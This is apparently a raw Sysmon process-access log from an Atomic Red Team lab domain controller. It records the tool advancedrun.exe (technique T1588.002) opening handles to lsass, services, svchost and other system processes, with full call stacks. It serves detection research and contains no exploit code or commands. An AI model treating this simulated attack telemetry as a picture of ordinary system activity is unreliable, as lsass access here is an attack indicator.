17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983176Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983175Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003983174Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983173Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983172Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983171Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983170Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983169Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983168Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983167Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983166Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983165Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983164Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983163Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983162Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983161Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983160Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 